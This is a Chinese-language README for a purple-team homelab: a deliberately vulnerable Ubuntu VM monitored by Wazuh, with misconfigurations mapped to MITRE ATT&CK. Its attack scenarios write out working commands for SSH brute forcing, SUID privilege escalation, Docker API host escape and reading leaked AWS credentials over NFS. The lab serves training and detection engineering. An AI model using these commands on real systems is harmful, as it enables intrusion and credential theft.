gregqlewis/purple-team-homelab

# Purple Team Lab：现代漏洞测试环境 [](https://opensource.org/licenses/MIT) [](https://ubuntu.com/) [](https://attack.mitre.org/) 一个基于 Ubuntu 24.04 LTS 构建的综合紫队实验室环境，专为安全研究、漏洞测试和检测工程而设计。该实验室实现了真实世界的云安全错误配置和传统漏洞，并由 Wazuh SIEM 进行监控。 **作者：** Greg Lewis **博客：** [gregqlewis.com](https://gregqlewis.com) **目的：** 安全研究、CISSP 考试准备和作品集展示 ## 🎯 概述 本项目展示了一个生产级漏洞环境，其特点包括： - 模拟企业环境中发现的 **真实世界安全错误配置** - 将漏洞映射到 **MITRE ATT&CK** 框架技术 - 集成 **Wazuh SIEM** 进行检测工程 - 专注于 **云安全** 场景（Docker, AWS 凭证） - 为 **攻防** 安全操作提供实践经验 **⚠️ 警告：** 该系统是故意设计为存在漏洞的。**切勿**部署在生产网络或面向互联网的系统上。 ## 🏗️ 架构 ``` ┌─────────────────────────────────────────────────┐ │ Unraid Server │ │ │ │ ┌──────────────────────────────────────────┐ │ │ │ Ubuntu 24.04 VulnLab │ │ │ │ • SSH (weak authentication) │ │ │ │ • DVWA (vulnerable web app) │ │ │ │ • Docker API (exposed) │ │ │ │ • AWS credentials (leaked) │ │ │ │ • NFS/FTP/SMB (open shares) │ │ │ │ • SUID binaries │ │ │ │ • Vulnerable cron jobs │ │ │ │ │ │ │ │ [Wazuh Agent] ──────────────────────────┐│ │ │ └──────────────────────────────────────────┘ │ │ │ │ │ ┌─────────────────────────────────────────┼───┐│ │ │ Wazuh Manager + Graylog + OpenSearch │ ││ │ │ • Custom detection rules │ ││ │ │ • MITRE ATT&CK mapping │ ││ │ │ • Real-time alerting │ ││ │ └─────────────────────────────────────────────┘│ └─────────────────────────────────────────────────┘ ▲ │ Attack simulations │ ┌──────┴──────┐ │ Kali Linux │ │ (Attacker) │ └─────────────┘ ``` ## 🔥 已实现的漏洞 | 类别 | 漏洞 | MITRE 技术 | 风险等级 | |----------|---------------|-----------------|------------| | **认证** | 启用了 Root SSH 登录 | T1078 | 严重 | | **认证** | 弱用户密码 | T1110 | 高 | | **Web 应用** | DVWA 安装 | T1190 | 严重 | | **容器安全** | Docker API 暴露 (端口 2375) | T1611 | 严重 | | **凭证泄露** | 文件中的 AWS 凭证 | T1552.001 | 严重 | | **权限提升** | SUID bash 二进制文件 | T1548 | 严重 | | **权限提升** | 全局可写的 cron 脚本 | T1053.003 | 高 | | **网络服务** | 匿名 FTP 访问 | T1021.002 | 高 | | **网络服务** | 开放的 NFS 共享 | T1039 | 高 | | **网络服务** | SMB 访客访问 | T1021.002 | 中 | | **Web 配置** | PHP 配置文件泄露 | T1552 | 高 | **总覆盖范围：** 跨 7 个战术的 15+ 项 MITRE ATT&CK 技术 ## 🚀 快速开始 ### 前置条件 - 虚拟机管理程序 - Ubuntu 24.04 LTS Server ISO - 至少 4GB 内存，2 个 CPU 核心，50GB 磁盘 - Kali Linux（用于攻击模拟，可选） - Wazuh Manager（用于监控，可选） ### 安装 **选项 1：自动设置（推荐）** ``` # Clone repository git clone https://github.com/yourusername/purple-team-lab.git cd purple-team-lab # 运行完整安装 cd scripts/setup chmod +x install-all.sh sudo ./install-all.sh ``` **选项 2：手动分步安装** 详细的手动安装说明请参见 [docs/installation.md](docs/installation.md)。 ### 安装后 1. **验证服务：** ./scripts/verify-lab.sh 2. **配置 Wazuh Agent：** - 编辑 `/var/ossec/etc/ossec.conf` - 设置你的 Wazuh Manager IP - 重启 agent：`systemctl restart wazuh-agent` 3. **访问 DVWA：** - 导航至：`http:///DVWA/` - 登录：`admin` / `password` - 点击 "Create / Reset Database" ## 🎯 攻击场景 ### 场景 1：初始访问 → 权限提升 ``` # SSH 暴力破解 hydra -l admin -p admin ssh:// # Exploit SUID binary ssh admin@ /usr/local/bin/rootbash -p ``` ### 场景 2：通过 Docker API 进行容器逃逸 ``` # 访问暴露的 Docker API docker -H tcp://:2375 ps # 部署特权容器 docker -H tcp://:2375 run -it --privileged -v /:/host ubuntu chroot /host ``` ### 场景 3：云凭证窃取 ``` # 挂载 NFS share sudo mount -t nfs :/home /mnt/target # 提取 AWS credentials cat /mnt/target/developer/.aws/credentials ``` **完整攻击场景：** [docs/attack-scenarios.md](docs/attack-scenarios.md) ## 🛡️ 检测工程 提供了自定义 Wazuh 规则以检测所有已实现的攻击技术： - SSH root 登录尝试 - Docker API 未授权访问 - AWS 凭证文件访问 - SUID 二进制文件执行 - NFS 挂载操作 - FTP 匿名连接 - 可疑的 cron 脚本修改 **规则详情：** [docs/detection-rules.md](docs/detection-rules.md) ## 📊 MITRE ATT&CK 覆盖范围 ### 覆盖的战术 - **初始访问** (3 项技术) - **执行** (1 项技术) - **持久化** (1 项技术) - **权限提升** (3 项技术) - **凭证访问** (2 项技术) - **发现** (3 项技术) - **横向移动** (2 项技术) - **收集** (1 项技术) **完整映射：** [docs/mitre-mapping.md](docs/mitre-mapping.md) ## 📚 文档 - **[架构](docs/architecture.md)** - 详细的系统设计 - **[安装指南](docs/installation.md)** - 分步设置 - **[攻击场景](docs/attack-scenarios.md)** - 实际漏洞利用示例 - **[检测规则](docs/detection-rules.md)** - Wazuh SIEM 配置 - **[MITRE 映射](docs/mitre-mapping.md)** - ATT&CK 框架对齐 ## 🔒 安全注意事项 **本实验室故意设计为存在漏洞。请遵循以下准则：** 1. ⚠️ **切勿** 暴露在互联网上 2. ⚠️ 仅部署在隔离网络中 3. ⚠️ 使用独立的 VLAN 或物理隔离环境 4. ⚠️ 定期快照/备份以便快速恢复 5. ⚠️ 监控未经授权的访问 6. ⚠️ 不使用时销毁环境 **此环境仅用于教育目的。** ## 🎓 学习目标 本实验室有助于培养以下技能： - **进攻性安全：** 漏洞利用、渗透测试 - **防御性安全：** SIEM 配置、检测工程 - **云安全：** 容器逃逸、凭证窃取、API 安全 - **事件响应：** 攻击检测、日志分析 - **合规性：** MITRE ATT&CK 框架、安全控制 **非常适合：** - CISSP 考试准备（领域 3、5、6、7） - 安全分析师技能发展 - 云安全工程师培训 - 紫队操作实践 ## 📝 许可证 本项目根据 MIT 许可证授权 - 详见 [LICENSE](LICENSE) 文件。 ## 🙏 致谢 - **DVWA Team** - Damn Vulnerable Web Application - **Wazuh** - 开源 SIEM 平台 - **MITRE ATT&CK** - 威胁建模框架 - **Rapid7** - Metasploitable 项目灵感 ## 📧 联系方式 **Greg Lewis** - 博客：[gregqlewis.com](https://gregqlewis.com) - LinkedIn：[linkedin.com/in/gregqlewis](https://linkedin.com/in/gregqlewis) - GitHub：[@gregqlewis](https://github.com/gregqlewis) **免责声明：** 本项目仅用于教育目的。作者不对滥用此信息负责。 ## 🔖 标签 `cybersecurity` `purple-team` `vulnerability-testing` `mitre-attack` `wazuh` `docker-security` `cloud-security` `penetration-testing` `siem` `detection-engineering` `ubuntu` `cissp` `offensive-security` `defensive-security` `home-lab`

标签：AWS 凭证泄露, CISA项目, CISSP 备考, Docker 容器安全, DVWA, HTTP工具, MITRE ATT&CK 映射, SIEM 检测工程, SSH 暴力破解, Ubuntu 24.04, Wazuh, 内存分配, 安全助手, 安全运营, 扫描框架, 故意脆弱环境, 漏洞靶场, 紫队演练, 网络安全实验, 网络安全审计, 请求拦截, 防御检测